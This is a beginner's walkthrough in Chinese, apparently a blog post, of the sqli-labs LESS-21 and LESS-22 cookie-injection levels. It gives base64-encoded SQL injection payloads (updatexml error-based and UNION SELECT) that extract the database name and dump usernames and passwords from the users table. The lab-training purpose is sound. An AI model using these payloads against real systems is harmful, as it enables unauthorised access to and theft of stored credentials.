小白写的,肯定有很多错误,一定要多指正!
LESS-21
页面是一个登录窗口
先用弱口令登录试一试 :
admin
123
cookies上面的uname被base64加密过,猜测我们的注入命令也需要用base64加密之后才能正常的运行。这里和前面一样,我们用hackbar注入会方便,但是可能因为有bug,所以注入之后要刷新才能看出来。
先用单引号注入试一试(用base64加密):
有回显 ,说明存在sql注入,但是要将命令用base64加密才能正常进行。查询数据库名:
uname=YWRtaW4gYW5kICcgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgnficsKHNlbGVjdCBkYXRhYmFzZSgpKSksMSkgYW5kICcxJz0nMQ==
我们知道了数据库名称是security。其实这里可以用普通的注入命令,只要换成base64编码就行。既然如此我们就直接查询最后的数据库内容:
uname=LWFkbWluJykgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQoaWQscGFzc3dvcmQsdXNlcm5hbWUpIGZyb20gc2VjdXJpdHkudXNlcnMgIw==
注入成功。
LESS-22
用一样的方式弱口令登入进去:
admin&123
登陆成功后,发现依然是在cookies处进行注入
测试之后,发现是双引号类型的注入。
那就直接修改一下命令:
uname=YWRtaW4iIGFuZCB1cGRhdGV4bWwgKDEsY29uY2F0KDB4NWMsKHNlbGVjdCBncm91cF9jb25jYXQodXNlcm5hbWUscGFzc3dvcmQpIGZyb20gdXNlcnMpLDB4NWMpLDEpIw==
over